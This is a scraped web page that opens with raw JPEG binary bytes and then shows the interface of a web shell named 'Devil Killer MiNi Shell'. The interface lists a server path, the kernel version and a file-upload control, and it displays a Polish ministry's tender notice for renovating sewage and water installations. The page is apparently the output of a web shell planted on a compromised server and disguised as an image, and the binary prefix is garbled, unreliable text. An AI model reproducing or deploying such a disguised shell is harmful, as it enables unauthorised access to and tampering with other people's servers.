JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250905/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20250905/0041010301-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Remont pionu kanalizacyjnego, instalacji wody zimnej, wody oligoceńskiej oraz toalet zlokalizowanych przy klatce A w budynku Ministerstwa Klimatu i Środowiska. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Ministerstwo Klimatu i Środowiska</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 001064858</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Wawelska 52/54</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">00-922</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">monika.wisniewska@klimat.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">bip.mos.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Środowisko</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Remont pionu kanalizacyjnego, instalacji wody zimnej, wody oligoceńskiej oraz toalet zlokalizowanych przy klatce A w budynku Ministerstwa Klimatu i Środowiska. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4fcbb9e3-f83e-4730-9487-036b37e71aa3</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00410103</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-09-05</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00106063/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Remont łazienek, pionów łazienkowych oraz doprowadzenie ciepłej wody cyrkulacyjnej do pionu A w budynku MKiŚ (BDG 39)</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zamowienia-mos.ezamawiajacy.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zamowienia-mos.ezamawiajacy.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">(numeracja zgodna z SWZ)<br/><br/>2.1. Komunikacja między zamawiającym a wykonawcami odbywa się w języku polskim za<br/>pośrednictwem Platformy zakupowej pod adresem https://zamowienia-mos.ezamawiajacy.pl/<br/>2.2. Zamawiający nie przewiduje komunikowania się z wykonawcami w inny sposób niż przy<br/>użyciu środków komunikacji elektronicznej.<br/>2.3. Dokumentacja niniejszego postępowania została opublikowana na Platformie. W celu<br/>zapoznania się z dokumentacją postępowania wykonawca po przejściu na dedykowany<br/>zamawiającemu adres Platformy:<br/>2.3.1 Do upłynięcia terminu składania ofert przechodzi do zakładki „Lista postępowań PZP”,<br/>a następnie zakładki „Aktualne”.<br/>2.3.2 Po upłynięciu terminu składania ofert przechodzi do zakładki „Lista postępowań PZP”,<br/>wybiera zakładkę „W toku”.<br/>2.4. Złożenie oferty wymaga zalogowania na Platformie poprzez aplikację Marketplanet OnePlace.<br/>2.5. Instrukcja w jaki sposób zarejestrować się i korzystać z Platformy, znajduje się w zakładce<br/>„Baza wiedzy”, dostępnej pod adresem: https://zamowienia-mos.ezamawiajacy.pl/.<br/>2.6. Instrukcja założenia konta zawarta jest na Platformie w zakładce „Baza wiedzy”.<br/>2.7. Zwrócenie się do Zamawiającego z wnioskiem o wyjaśnienie treści SWZ nie wymaga<br/>logowania do Platformy. Sposób złożenia wniosku oraz przekazanie wyjaśnień zostało<br/>szczegółowo określone w Rozdziale 18 SWZ.<br/>2.8. Zamawiający wymaga przekazywania sobie przez strony postępowania oświadczeń, wniosków,<br/>zawiadomień oraz informacji przy użyciu środków komunikacji elektronicznej za pośrednictwem Platformy. Szczegółowa Instrukcja korzystania z Platformy, w tym sposób<br/>wykonywania poszczególnych czynności, dostępna jest w zakładce „Baza wiedzy”.<br/>2.9. Zamawiający, zgodnie z § 11 ust. 2 Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia<br/>2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań<br/>technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. 2020 poz. 2452)<br/>określa niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na Platformie<br/>Zakupowej, w tym informację nt. specyfikacji połączenia, tj.:<br/>a) Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512<br/>kb/s;<br/>b) Komputer klasy PC lub MAC, spełniający wymagania zainstalowanego systemu<br/>operacyjnego oraz wymagania używanej przeglądarki internetowej;<br/>c) Zainstalowana dowolna przeglądarka internetowa w wersji wspieranej przez producenta<br/>obsługująca TLS 1.2,<br/>d) Włączona obsługa JavaScript;<br/>e) Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.<br/>2.10. Zamawiający zgodnie z § 11 ust. 2 ww. Rozporządzenia dopuszcza formaty przesyłanych<br/>danych tj. plików o wielkości do 2 GB w txt, rtf, pdf, xps, odt, ods, odp, doc, xls, ppt, docx,<br/>xlsx, pptx, csv, jpg, jpeg, tif, tiff, geotiff, png, svg, wav, mp3, avi, mpg, mpeg, mp4, m4a,<br/>mpeg4, ogg, ogv, zip, tar, gz, gzip, 7z, html, xhtml, css, xml, xsd, gml, rng, xsl, xslt, TSL,<br/>XMLsig, XAdES, CAdES, ASIC, XMLenc</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna dotycząca przetwarzania danych osobowych w związku z udziałem w<br/>postępowaniu o udzielenie zamówienia publicznego na podstawie ustawy Prawo zamówień publicznych.<br/><br/>1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia<br/>27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych<br/>osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE<br/>(Dz. Urz. UE L 119 z 04.05.2016, str. 1, z późn. zm.), dalej jako: RODO uprzejmie informuję, że:<br/><br/>1) Administratorem Pani/Pana danych osobowych jest Minister Klimatu i Środowiska.<br/><br/>2) Może się Pani/Pan z nami kontaktować w następujący sposób:<br/>- listownie na adres: ul. Wawelska 52/54, 00-922 Warszawa<br/>- poprzez elektroniczną skrzynkę podawczą: /mos/skrytka<br/>- poprzez e-mail: info@klimat.gov.pl<br/>- telefonicznie: 22 36 92 900.<br/><br/>3) Nad prawidłowością przetwarzania Pani/Pana danych osobowych czuwa wyznaczony przez<br/>Administratora inspektor ochrony danych (IOD), z którym można się kontaktować:<br/>- listownie na adres: ul. Wawelska 52/54, 00-922 Warszawa<br/>- poprzez elektroniczną skrzynkę podawczą: /mos/skrytka<br/>- poprzez e-mail: inspektor.ochrony.danych@klimat.gov.pl.<br/><br/>4) Do IOD należy kierować wyłącznie sprawy dotyczące przetwarzania Pani/Pana danych przez<br/>administratora, w tym realizacji Pani/Pana praw wynikających z RODO.<br/><br/>5) Pani/Pana dane osobowe będą przetwarzane w celu:<br/>- przeprowadzenia postępowania o udzielenie zamówienia publicznego pn. Remont pionu<br/>kanalizacyjnego, instalacji wody zimnej, wody oligoceńskiej oraz toalet zlokalizowanych<br/>przy klatce A w budynku Ministerstwa Klimatu i Środowiska.<br/>- w celu wypełnienia obowiązku archiwizacji dokumentów.<br/><br/>6) Pani/Pana dane osobowe są udostępniane podmiotowi, który przetwarza dane osobowe w<br/>imieniu Administratora na podstawie zawartej umowy powierzenia przetwarzania danych<br/>osobowych (tzw. podmiot przetwarzający), tj. firmom świadczącym usługi informatyczne ma<br/>rzecz Ministerstwa Klimatu i Środowiska.<br/><br/>7) Odbiorcami Pani/Pana danych osobowych mogą być również osoby lub podmioty, którym<br/>udostępniona zostanie dokumentacja postępowania, w oparciu o art. 18 oraz art. 74 ustawy Pzp,<br/>a także Prezes Urzędu Zamówień Publicznych zs. w Warszawie jako Administrator danych<br/>osobowych użytkowników Platformy e-Zamówienia, na której MKiŚ prowadzi postępowania o<br/>udzielenie zamówienia publicznego pod adresem https://ezamowienia.gov.pl/pl<br/><br/>8) Pani/Pana dane osobowe mogą być również udostępnione organom upoważnionym na<br/>podstawie przepisów prawa powszechnie obowiązującego, nie stanowią jednak one odbiorców<br/>danych w rozumieniu przepisów RODO.<br/><br/>(...)<br/><br/>Aby skorzystać z powyższych praw należy skontaktować się z nami lub z naszym inspektorem ochrony<br/>danych (dane kontaktowe zawarte są powyżej).<br/>- prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych (ul. Moniuszki 1A, 00-014 Warszawa), jeśli uzna Pani/Pan, że przetwarzamy Pani/Pana dane<br/>niezgodnie z prawem.<br/><br/>11) Nie przysługuje Pani/Panu:<br/>- w związku z art. 17 ust. 3 lit. b, d lub e RODO - prawo do usunięcia danych osobowych;<br/>- prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>- na podstawie art. 21 RODO prawo do sprzeciwu, wobec przetwarzania danych<br/>osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art.<br/>6 ust. 1 lit. c RODO.<br/><br/>12) Nie przekazujemy Pani/Pana danych do państw trzecich.<br/><br/>13) Pani/Pana dane osobowe nie podlegają zautomatyzowanemu przetwarzaniu, w tym<br/>profilowaniu.<br/><br/>14) Podanie przez Panią/Pana danych jest wymogiem ustawowym, określonym w przepisach Pzp,<br/>związanych z udziałem w postępowaniu o udzielenie zamówienia publicznego. Skutkiem<br/>niepodania danych będzie odrzucenie Pana/Pani oferty.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BDGwzp/260/41/2025/MW</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 699877,62 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> (numeracja zgodna z SWZ)<br/><br/>3.1.	Przedmiotem zamówienia jest wykonanie remontu pionu kanalizacyjnego, instalacji wody zimnej, wody oligoceńskiej oraz toalet zlokalizowanych przy klatce A w budynku Ministerstwa Klimatu i Środowiska. <br/>3.2.	Szczegółowy opis przedmiotu zamówienia zawiera Załącznik nr 1 do SWZ, który stanowi wzór umowy wraz z dokumentacją projektową, przedmiarem, specyfikacją techniczną wykonania i odbioru robót budowlanych, a także opisem parametrów równoważności dla materiałów, gdzie użyto nazw własnych w dokumentacji projektowej. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45453000-7 - Roboty remontowe i renowacyjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą się ubiegać wykonawcy, którzy:<br/><br/>5.1. nie podlegają wykluczeniu z postępowania na podstawie:<br/><br/>5.1.1. art. 108 ust. 1 ustawy Pzp:<br/>1. Z postępowania o udzielenie zamówienia wyklucza się wykonawcę:<br/>1) będącego osobą fizyczną, którego prawomocnie skazano za przestępstwo:<br/>a. udziału w zorganizowanej grupie przestępczej albo związku mającym na celu<br/>popełnienie przestępstwa lub przestępstwa skarbowego, o którym mowa w art.<br/>258 Kodeksu karnego,<br/>b. handlu ludźmi, o którym mowa w art. 189a Kodeksu karnego,<br/>c. o którym mowa w art. 228-230a, art. 250a Kodeksu karnego, w art. 46-48 ustawy<br/>z dnia 25 czerwca 2010 r. o sporcie (Dz.U. z 2023 r. poz. 2048 oraz z 2024 r. poz.<br/>1166) lub w art. 54 ust. 1-4 ustawy z dnia 12 maja 2011 r. o refundacji leków,<br/>środków spożywczych specjalnego przeznaczenia żywieniowego oraz wyrobów<br/>medycznych (Dz.U. z 2024 r. poz. 930),<br/>d. finansowania przestępstwa o charakterze terrorystycznym, o którym mowa w art.<br/>165a Kodeksu karnego, lub przestępstwo udaremniania lub utrudniania<br/>stwierdzenia przestępnego pochodzenia pieniędzy lub ukrywania ich<br/>pochodzenia, o którym mowa w art. 299 Kodeksu karnego,<br/>e. o charakterze terrorystycznym, o którym mowa w art. 115 § 20 Kodeksu karnego,<br/>lub mające na celu popełnienie tego przestępstwa,<br/>f. powierzenia wykonywania pracy małoletniemu cudzoziemcowi, o którym mowa<br/>w art. 9 ust. 2 ustawy z dnia 15 czerwca 2012 r. o skutkach powierzania<br/>wykonywania pracy cudzoziemcom przebywającym wbrew przepisom na<br/>terytorium Rzeczypospolitej Polskiej (Dz.U. z 2021 r. poz. 1745),<br/>g. przeciwko obrotowi gospodarczemu, o których mowa w art. 296-307 Kodeksu<br/>karnego, przestępstwo oszustwa, o którym mowa w art. 286 Kodeksu karnego,<br/>przestępstwo przeciwko wiarygodności dokumentów, o których mowa w art.<br/>270-277d Kodeksu karnego, lub przestępstwo skarbowe,<br/>h. o którym mowa w art. 9 ust. 1 i 3 lub art. 10 ustawy z dnia 15 czerwca 2012 r. o<br/>skutkach powierzania wykonywania pracy cudzoziemcom przebywającym<br/>wbrew przepisom na terytorium Rzeczypospolitej Polskiej - lub za odpowiedni<br/>czyn zabroniony określony w przepisach prawa obcego;<br/>2) jeżeli urzędującego członka jego organu zarządzającego lub nadzorczego, wspólnika<br/>spółki w spółce jawnej lub partnerskiej albo komplementariusza w spółce<br/>komandytowej lub komandytowo-akcyjnej lub prokurenta prawomocnie skazano za<br/>przestępstwo, o którym mowa w pkt 1;<br/>3) wobec którego wydano prawomocny wyrok sądu lub ostateczną decyzję<br/>administracyjną o zaleganiu z uiszczeniem podatków, opłat lub składek na<br/>ubezpieczenie społeczne lub zdrowotne, chyba że wykonawca odpowiednio przed<br/>upływem terminu do składania wniosków o dopuszczenie do udziału w postępowaniu<br/>albo przed upływem terminu składania ofert dokonał płatności należnych podatków,<br/>opłat lub składek na ubezpieczenie społeczne lub zdrowotne wraz z odsetkami lub<br/>grzywnami lub zawarł wiążące porozumienie w sprawie spłaty tych należności;<br/>4) wobec którego prawomocnie orzeczono zakaz ubiegania się o zamówienia publiczne;<br/>5) jeżeli zamawiający może stwierdzić, na podstawie wiarygodnych przesłanek, że<br/>wykonawca zawarł z innymi wykonawcami porozumienie mające na celu zakłócenie<br/>konkurencji, w szczególności, jeżeli należąc do tej samej grupy kapitałowej w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów,<br/>złożyli odrębne oferty, oferty częściowe lub wnioski o dopuszczenie do udziału w<br/>postępowaniu, chyba że wykażą, że przygotowali te oferty lub wnioski niezależnie od<br/>siebie;<br/>6) jeżeli, w przypadkach, o których mowa w art. 85 ust. 1, doszło do zakłócenia<br/>konkurencji wynikającego z wcześniejszego zaangażowania tego wykonawcy lub<br/>podmiotu, który należy z wykonawcą do tej samej grupy kapitałowej w rozumieniu<br/>ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów, chyba że<br/>spowodowane tym zakłócenie konkurencji może być wyeliminowane w inny sposób<br/>niż przez wykluczenie wykonawcy z udziału w postępowaniu o udzielenie<br/>zamówienia.<br/><br/>5.1.2. art. 109 ust. 1 pkt 4 ustawy Pzp:<br/>1. Z postępowania o udzielenie zamówienia zamawiający może wykluczyć<br/>wykonawcę:<br/>4) w stosunku, do którego otwarto likwidację, ogłoszono upadłość, którego aktywami<br/>zarządza likwidator lub sąd, zawarł układ z wierzycielami, którego działalność<br/>gospodarcza jest zawieszona albo znajduje się on w innej tego rodzaju sytuacji<br/>wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia<br/>tej procedury;<br/><br/>5.1.3. art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w<br/>zakresie przeciwdziałania wspierania agresji na Ukrainę oraz służących ochronie<br/>bezpieczeństwa narodowego:<br/>1. Z postępowania o udzielenie zamówienia publicznego lub konkursu prowadzonego<br/>na podstawie ustawy z dnia 11 września 2019 r. - Prawo zamówień publicznych<br/>wyklucza się:<br/>1) wykonawcę oraz uczestnika konkursu wymienionego w wykazach określonych<br/>w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisanego na listę<br/>na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu<br/>środka, o którym mowa w art. 1 pkt 3;<br/>2) wykonawcę oraz uczestnika konkursu, którego beneficjentem rzeczywistym w<br/>rozumieniu ustawy z dnia 1 marca 2018 r. o przeciwdziałaniu praniu pieniędzy<br/>oraz finansowaniu terroryzmu (Dz.U. z 2023 r. poz. 1124, z późn. zm.) jest osoba<br/>wymieniona w wykazach określonych w rozporządzeniu 765/2006 i<br/>rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem<br/>rzeczywistym od dnia 24 lutego 2022 r., o ile została wpisana na listę na<br/>podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu<br/>środka, o którym mowa w art. 1 pkt 3;<br/>3) wykonawcę oraz uczestnika konkursu, którego jednostką dominującą w<br/>rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29 września 1994 r. o rachunkowości<br/>(Dz.U. z 2023 r. poz. 120, 295 i 1598 oraz z 2024 r. poz. 619, 1685 i 1863) jest<br/>podmiot wymieniony w wykazach określonych w rozporządzeniu 765/2006 i<br/>rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką<br/>dominującą od dnia 24 lutego 2022 r., o ile został wpisany na listę na podstawie<br/>decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym<br/>mowa w art. 1 pkt 3.<br/><br/><br/>5.2. spełniają warunki udziału w postępowaniu, o których mowa w art. 112 ust. 2 ustawy Pzp, dotyczące:<br/><br/>5.2.1. zdolności do występowania w obrocie gospodarczym<br/>Zamawiający nie określa warunku w ww. 